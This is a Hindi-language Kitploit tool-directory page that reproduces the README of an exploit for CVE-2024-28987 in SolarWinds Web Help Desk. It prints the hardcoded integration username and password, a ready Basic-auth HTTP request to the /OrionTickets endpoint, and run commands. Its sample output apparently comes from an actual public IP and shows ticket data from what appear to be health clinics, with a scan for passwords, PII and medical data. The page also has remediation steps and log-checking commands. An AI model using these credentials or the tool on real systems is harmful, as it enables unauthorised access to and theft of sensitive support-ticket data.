Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2024-28987 — **CVE-2024-28987** SolarWinds Web Help Desk (WHD) में एक गंभीर भेद्यता है जो दूरस्थ हमलावरों को **हार्डकोडेड क्रेडेंशियल्स** का उपयोग करके संवेदनशील टिकट जानकारी तक पहुंचने की अनुमति देती है। इस भेद्यता का **CVSS स्कोर 9.1 (गंभीर)** है और इसका सक्रिय रूप से वास्तविक दुनिया में शोषण किया जा रहा है। | Kitploit
उपकरण/GitHubGitHub/darabium/cve-2024-28987
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणडेटा निष्कासनपेनिट्रेशन टेस्टिंग
GitHubdarabium/cve-2024-28987

CVE-2024-28987

रिपॉजिटरी देखें
131 महीना पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →

विवरण

**CVE-2024-28987** SolarWinds Web Help Desk (WHD) में एक गंभीर भेद्यता है जो दूरस्थ हमलावरों को **हार्डकोडेड क्रेडेंशियल्स** का उपयोग करके संवेदनशील टिकट जानकारी तक पहुंचने की अनुमति देती है। इस भेद्यता का **CVSS स्कोर 9.1 (गंभीर)** है और इसका सक्रिय रूप से वास्तविक दुनिया में शोषण किया जा रहा है।

साझा करें

CVE-2024-28987 - SolarWinds Web Help Desk हार्डकोडेड क्रेडेंशियल्स शोषण

Python License CVE CVSS

⚠️ अस्वीकरण: यह टूल केवल शैक्षिक और अधिकृत सुरक्षा परीक्षण उद्देश्यों के लिए है। कंप्यूटर सिस्टम तक अनधिकृत पहुंच अवैध है। इस टूल का उपयोग केवल उन सिस्टमों पर करें जिनके स्वामी आप हैं या जिनके परीक्षण की स्पष्ट अनुमति आपके पास है।


📋 अवलोकन

CVE-2024-28987 SolarWinds Web Help Desk (WHD) में एक गंभीर भेद्यता है जो दूरस्थ हमलावरों को हार्डकोडेड क्रेडेंशियल्स का उपयोग करके संवेदनशील टिकट जानकारी तक पहुंचने की अनुमति देती है। इस भेद्यता का CVSS स्कोर 9.1 (गंभीर) है और इसका सक्रिय रूप से वास्तविक दुनिया में शोषण किया जा रहा है।

भेद्यता विवरण

विशेषतामान
CVE IDCVE-2024-28987
CVSS स्कोर9.1 (गंभीर)
CWECWE-798 (हार्डकोडेड क्रेडेंशियल्स)
प्रभावित उत्पादSolarWinds Web Help Desk ≤ 12.8.3 हॉटफिक्स 1
पैच किया गया संस्करण12.8.3 हॉटफिक्स 2
शोषणवास्तविक दुनिया में सक्रिय रूप से शोषित
CISA KEV में जोड़ा गया15 अक्टूबर, 2024

प्रभाव

एक अनधिकृत हमलावर यह कर सकता है:

  • संवेदनशील जानकारी वाले सभी समर्थन टिकटों तक पहुंच सकता है
  • अस्थायी पासवर्ड, रीसेट अनुरोध और साझा सेवा क्रेडेंशियल्स देख सकता है
  • /OrionTickets एंडपॉइंट के माध्यम से टिकटों पर CRUD संचालन कर सकता है
  • संभावित रूप से नेटवर्क में अन्य सिस्टम तक पहुंच सकता है

🔧 विशेषताएं

  • ✅ स्वचालित भेद्यता पहचान - हार्डकोडेड क्रेडेंशियल्स के लिए परीक्षण करता है
  • ✅ टिकट निष्कर्षण - कमजोर सिस्टम से सभी टिकट प्राप्त करता है
  • ✅ संवेदनशील डेटा स्कैनिंग - पासवर्ड, क्रेडेंशियल्स, PII और चिकित्सा डेटा की पहचान करता है
  • ✅ कई आउटपुट प्रारूप - बड़े डेटासेट के लिए JSON और JSONL
  • ✅ इंटरैक्टिव पूर्वावलोकन - निष्कर्षण से पहले पहले 3 टिकट दिखाता है
  • ✅ शून्य निर्भरताएं - केवल Python मानक लाइब्रेरी का उपयोग करता है
  • ✅ रंगीन आउटपुट - ANSI रंगों के साथ बेहतर पठनीयता
  • ✅ त्रुटि प्रबंधन - कनेक्शन त्रुटियों का सुचारू प्रबंधन

🚀 त्वरित प्रारंभ

पूर्वापेक्षाएँ

  • Python 3.6 या उच्चतर
  • कोई बाहरी निर्भरता आवश्यक नहीं है!

स्थापना

root@kitploit:~
# रिपॉजिटरी क्लोन करें
git clone https://github.com/Darabium/CVE-2024-28987.git
cd CVE-2024-28987

# स्क्रिप्ट को निष्पादन योग्य बनाएं
उपयोग
bash
# तर्क के रूप में लक्ष्य URL के साथ
python3 cve-2024-28987.py http://target-ip:port

# इंटरैक्टिव मोड (लक्ष्य के लिए संकेत देगा)
python3 cve-2024-28987.py

# कमजोर लक्ष्य के साथ उदाहरण
python3 cve-2024-28987.py http://192.168.1.100:8098
📊 आउटपुट उदाहरण
bash
$ python3 cve-2024-28987.py http://138.94.193.65:8098

    ╔══════════════════════════════════════════════════════════════════╗
    ║                                                                  ║
    ║   ██████╗██╗   ██╗███████╗    ██████╗  ██████╗ ██╗  ██╗███████╗ ║
    ║  ██╔════╝██║   ██║██╔════╝    ╚════██╗██╔═████╗██║  ██║██╔════╝ ║
    ║  ██║     ██║   ██║█████╗       █████╔╝██║██╔██║███████║█████╗   ║
    ║  ██║     ╚██╗ ██╔╝██╔══╝      ██╔═══╝ ████╔╝██║██╔══██║██╔══╝   ║
    ║  ╚██████╗ ╚████╔╝ ███████╗    ███████╗╚██████╔╝██║  ██║███████╗ ║
    ║   ╚═════╝  ╚═══╝  ╚══════╝    ╚══════╝ ╚═════╝ ╚═╝  ╚═╝╚══════╝ ║
    ║                                                                  ║
    ║         CVE-2024-28987 - SolarWinds Web Help Desk               ║
    ║         हार्डकोडेड क्रेडेंशियल्स भेद्यता                      ║
    ║                                                                  ║
    ╠══════════════════════════════════════════════════════════════════╣
    ║  GitHub: https://github.com/Darabium                        ║
    ╚══════════════════════════════════════════════════════════════════╝

[*] जाँच की जा रही है: http://****:**/helpdesk/WebObjects/Helpdesk.woa/ra/OrionTickets/
[+] लक्ष्य कमजोर है!
[+] 42 टिकट मिले

======================================================================
[📋] टिकट पूर्वावलोकन (पहले 3 टिकट)
======================================================================

टिकट #1
  ├── ID: 5690
  ├── ग्राहक: UBS Portao Vermelho
  ├── स्थिति: खुला
  ├── विवरण: BOA TARDE ENCAMINHO SOLICITAÇÃO DE MATERIAIS DA ODONTO

टिकट #2
  ├── ID: 5691
  ├── ग्राहक: UBS Centro
  ├── स्थिति: प्रगति पर
  ├── विवरण: ALCOOL 70% - Solicitação de material de limpeza

======================================================================
[🔐] संवेदनशील डेटा के लिए स्कैनिंग
======================================================================

[!] टिकट #5723 में संभावित PASSWORD डेटा मिला
    └── विवरण: कृपया सिस्टम एक्सेस के लिए मेरा पासवर्ड रीसेट करें...

[?] क्या आप सभी टिकटों को फ़ाइल में निकालना चाहते हैं? [y/N]: y

[*] सहेजा जा रहा है: 138_94_193_65_8098_tickets.json
[✓] 138_94_193_65_8098_tickets.json सफलतापूर्वक सहेजा गया
[*] फ़ाइल आकार: 42,847 बाइट्स
[*] कुल टिकट: 42

[*] हो गया!

GitHub: https://github.com/Darabium

📁 फ़ाइल संरचना

CVE-2024-28987/

├── cve-2024-28987.py # मुख्य शोषण स्क्रिप्ट

├── README.md # यह फ़ाइल

└── LICENSE # MIT लाइसेंस

आउटपुट फ़ाइलें

जब आप टिकट निकालते हैं, तो निम्नलिखित फ़ाइलें बनाई जाती हैं:

मानक JSON प्रारूप (हमेशा बनाया जाता है)

138_94_193_65_8098_tickets.json

JSONL प्रारूप (यदि > 100 टिकट हों तो बनाया जाता है)

***_tickets.jsonl 🔍 तकनीकी विवरण हार्डकोडेड क्रेडेंशियल्स python USERNAME = "helpdeskIntegrationUser" PASSWORD = "dev-C4F8025E7" प्रभावित एंडपॉइंट text /helpdesk/WebObjects/Helpdesk.woa/ra/OrionTickets/ नमूना HTTP अनुरोध http GET /helpdesk/WebObjects/Helpdesk.woa/ra/OrionTickets/ HTTP/1.1 Host: vulnerable-target:8098 Authorization: Basic aGVscGRlc2tJbnRlZ3JhdGlvblVzZXI6ZGV2LUM0ZjgwMjVFNw== Content-Type: application/x-www-form-urlencoded 🛡️ उपचार तत्काल कार्रवाई SolarWinds Web Help Desk संस्करण 12.8.3 हॉटफिक्स 2 या बाद के संस्करण में तुरंत अपडेट करें

/OrionTickets एंडपॉइंट तक संदिग्ध पहुंच के लिए लॉग जांचें

टिकट डेटा तक अनधिकृत पहुंच की निगरानी करें

टिकटों में उजागर हो सकने वाले सभी क्रेडेंशियल्स रीसेट करें

संभावित डेटा रिसाव के लिए सभी समर्थन टिकटों की समीक्षा करें

पहचान कमांड bash

लॉग में शोषण प्रयासों की जांच करें

grep -i "OrionTickets" /var/log/webhelpdesk/access.log

अनधिकृत पहुंच पैटर्न की जांच करें

grep -i "helpdeskIntegrationUser" /var/log/webhelpdesk/access.log

वर्तमान संस्करण जांचें

cat /opt/WebHelpDesk/version.txt 🚨 CISA KEV सलाह इस भेद्यता को CISA की ज्ञात शोषित भेद्यताओं (KEV) सूची में जोड़ा गया है। संगठनों को निर्दिष्ट समय सीमा तक पैच करना आवश्यक है।

जोड़ने की तिथि: 15 अक्टूबर, 2024

आवश्यक कार्रवाई: विक्रेता निर्देशों के अनुसार अपडेट लागू करें

समय सीमा: 5 नवंबर, 2024 (21 दिन)

📚 संदर्भ NVD CVE-2024-28987

CISA KEV कैटलॉग

SolarWinds सुरक्षा सलाह

PEP 668 - बाहरी पर्यावरण प्रबंधन

🤝 योगदान योगदान का स्वागत है! कृपया बेझिझक पुल अनुरोध सबमिट करें या मुद्दे खोलें।

दिशानिर्देश रिपॉजिटरी को फोर्क करें

अपनी फीचर शाखा बनाएं (git checkout -b feature/AmazingFeature)

अपने परिवर्तन कमिट करें (git commit -m 'Add some AmazingFeature')

शाखा को पुश करें (git push origin feature/AmazingFeature)

पुल अनुरोध खोलें

📝 लाइसेंस यह प्रोजेक्ट MIT लाइसेंस के तहत लाइसेंस प्राप्त है - विवरण के लिए LICENSE फ़ाइल देखें।

⚡ लेखक Darabium - प्रारंभिक कार्य - GitHub

⚠️ महत्वपूर्ण नोट यह टूल सुरक्षा अनुसंधान और शैक्षिक उद्देश्यों के लिए है

उन सिस्टमों पर उपयोग न करें जिनके स्वामी आप नहीं हैं या जिनके परीक्षण की स्पष्ट अनुमति नहीं है

लेखक इस टूल के किसी भी दुरुपयोग के लिए जिम्मेदार नहीं है

हमेशा जिम्मेदार प्रकटीकरण प्रथाओं का पालन करें

अपने क्षेत्राधिकार में गोपनीयता और डेटा सुरक्षा कानूनों का सम्मान करें

🌟 स्टार इतिहास यदि आपको यह टूल उपयोगी लगता है, तो कृपया इसे GitHub पर ⭐ दें!

📞 समर्थन बग रिपोर्ट के लिए GitHub पर एक मुद्दा खोलें

सुरक्षा चिंताओं के लिए, कृपया GitHub के माध्यम से सीधे संपर्क करें

Darabium के लिए ❤️ के साथ बनाया गया

टूल डाउनलोड करें